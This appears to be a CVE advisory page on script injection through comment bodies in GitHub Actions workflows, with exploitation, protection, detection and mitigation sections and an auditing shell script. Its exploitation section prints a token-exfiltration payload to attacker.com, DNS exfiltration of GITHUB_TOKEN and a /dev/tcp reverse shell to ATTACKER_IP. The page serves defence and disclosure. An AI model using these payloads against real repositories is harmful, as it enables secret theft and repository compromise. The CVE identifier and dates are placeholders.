GitHub Actions, Code Injection, CVE-2024-XXXX (Critical)


How the CVE Works

The vulnerability arises from improper handling of `github.event.comment.body` in GitHub Actions workflows. The workflow interpolates the comment text directly into a shell command with a `${{ ... }}` expression, so the expansion happens before the shell ever runs and the comment body becomes part of the script itself. A specially crafted comment therefore yields arbitrary command execution on the runner.
The vulnerable workflow checks whether a comment contains "scalafmt", but it uses the raw comment body inside a shell conditional (`if [[ ... ]]`) without sanitization. An attacker can close the conditional and append their own commands, for example to exfiltrate `GITHUB_TOKEN` or other secrets via `curl`. Because the token carries `contents: write` permissions, full repository compromise is possible.

DailyCVE Form

Platform: GitHub Actions
Version: Unpatched workflows
Vulnerability: Code Injection
Severity: Critical
Date: 2024-XX-XX

Prediction: Patch expected by 2024-XX-XX (mitigation available)

What Undercode Says:

Exploitation

1. Payload Example:

test" == "test" ]]; then curl -X POST https://attacker.com -d "$GITHUB_TOKEN";

2. Exfiltration via DNS:

dig $(echo $GITHUB_TOKEN | base64).exfil.attacker.com

3. Reverse Shell:

bash -c 'exec bash -i &>/dev/tcp/ATTACKER_IP/443 <&1'

Protection

1. Input Sanitization (the protection comes from passing the value through an environment variable instead of expanding it inside the script; `format()` itself does not escape anything):

env:
  SAFE_BODY: ${{ format('{0}', github.event.comment.body) }}

2. Token Permissions Restriction:

permissions:
  contents: read

3. Workflow Hardening:

- name: Safe Comment Check
  run: |
    echo "$COMMENT" | grep -q "scalafmt"
  env:
    COMMENT: ${{ github.event.comment.body }}

Detection

1. Audit Workflows:

grep -r "github.event.comment.body" .github/workflows/

2. Monitor Suspicious Comments:

gh api -H "Accept: application/vnd.github.v3+json" /repos/OWNER/REPO/issues/comments
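The `grep` audit above only finds the string `github.event.comment.body`; it reports safe uses under `env:` just as loudly as dangerous ones inside `run:`, and it misses the other event fields that carry attacker-controlled text. The script below is an added example (not code from the page or from any project) that scans workflow files and flags only `${{ ... }}` expansions of untrusted event contexts that appear inside a `run:` step, single-line or block scalar. It goes beyond the page's case in covering the other commonly documented untrusted contexts (issue and pull request title/body, review bodies, `head_ref`, commit messages). The two sample workflows it writes are constructed for the demo: one mirrors the vulnerable `if [[ "${{ github.event.comment.body }}" ... ]]` pattern, the other the hardened environment-variable form from the Protection section.

```shell
#!/usr/bin/env bash
# Added example: audit GitHub Actions workflows for untrusted event data expanded
# directly inside run: steps. Sample workflows below are constructed, not from a real repo.

# Event fields that carry attacker-controlled text (per GitHub's script-injection guidance).
# [.] is used instead of \. because awk -v rewrites backslash escapes in its values.
UNTRUSTED_CONTEXT_RE='github[.]event[.](comment[.]body|issue[.](title|body)|pull_request[.](title|body|head[.]ref|head[.]label)|review[.]body|review_comment[.]body|head_commit[.]message|commits[.][^}]*message)|github[.]head_ref'

# Print "file:line: text" for every run: step that expands an untrusted context with ${{ }}.
# Exit status 0 when at least one finding was printed, 1 when the file is clean.
audit_workflow() {
  awk -v re="$UNTRUSTED_CONTEXT_RE" -v f="$1" '
    BEGIN { pat = "[$][{][{][^}]*(" re ")" }
    function flag(l) { print f ":" NR ": " l; hits++ }
    # Inside a block scalar (run: |) lines belong to the script while they are indented
    # deeper than the run: key; a dedent ends the script and the line is re-examined.
    in_run {
      if ($0 ~ /^[ \t]*$/) next
      match($0, /[^ ]/)
      if (RSTART > indent) { if ($0 ~ pat) flag($0); next }
      in_run = 0
    }
    # run: | or run: > opens a block scalar; remember the column of the key.
    /(^|[ \t])run:[ \t]*[|>]/ { in_run = 1; match($0, /run:/); indent = RSTART; next }
    # Single-line run: value.
    /(^|[ \t])run:/ { if ($0 ~ pat) flag($0) }
    END { exit (hits > 0 ? 0 : 1) }
  ' "$1"
}

# Number of findings, for scripting (e.g. failing a CI check when it is non-zero).
count_findings() {
  audit_workflow "$1" | wc -l | tr -d ' '
}

SAMPLE_DIR="$(mktemp -d)"

# Constructed sample workflows: the vulnerable pattern and the hardened env-variable form.
write_samples() {
  cat > "$SAMPLE_DIR/vulnerable.yml" <<'EOF'
name: scalafmt-fix
on:
  issue_comment:
    types: [created]
permissions:
  contents: write
jobs:
  fix:
    runs-on: ubuntu-latest
    steps:
      - name: Check comment
        run: |
          if [[ "${{ github.event.comment.body }}" == *scalafmt* ]]; then
            echo "running scalafmt"
          fi
EOF
  cat > "$SAMPLE_DIR/hardened.yml" <<'EOF'
name: scalafmt-fix
on:
  issue_comment:
    types: [created]
permissions:
  contents: read
jobs:
  fix:
    runs-on: ubuntu-latest
    steps:
      - name: Safe comment check
        run: |
          if [[ "$COMMENT" == *scalafmt* ]]; then
            echo "running scalafmt"
          fi
        env:
          COMMENT: ${{ github.event.comment.body }}
EOF
}

write_samples
for f in "$SAMPLE_DIR"/*.yml; do
  if audit_workflow "$f"; then echo "FLAGGED: $f"; else echo "clean: $f"; fi
done
```

Run it against a real checkout with `for f in .github/workflows/*.yml; do audit_workflow "$f"; done`; only the vulnerable sample is reported, because the hardened file expands the comment body under `env:`, where the runner stores it as data rather than splicing it into the script.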

Mitigation

1. Secret Rotation (revoke the exposed token and issue a replacement in GitHub first; the command only updates the stored secret value, and the `openssl rand` output stands in for the newly issued token):

gh secret set BROADBOT_GITHUB_TOKEN --body="$(openssl rand -hex 32)"

2. Disable Vulnerable Workflows:

gh workflow disable scalafmt-fix.yml

References

  • GitHub Actions Contexts: `https://docs.github.com/en/actions/learn-github-actions/contexts`
  • CWE-78: OS Command Injection

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
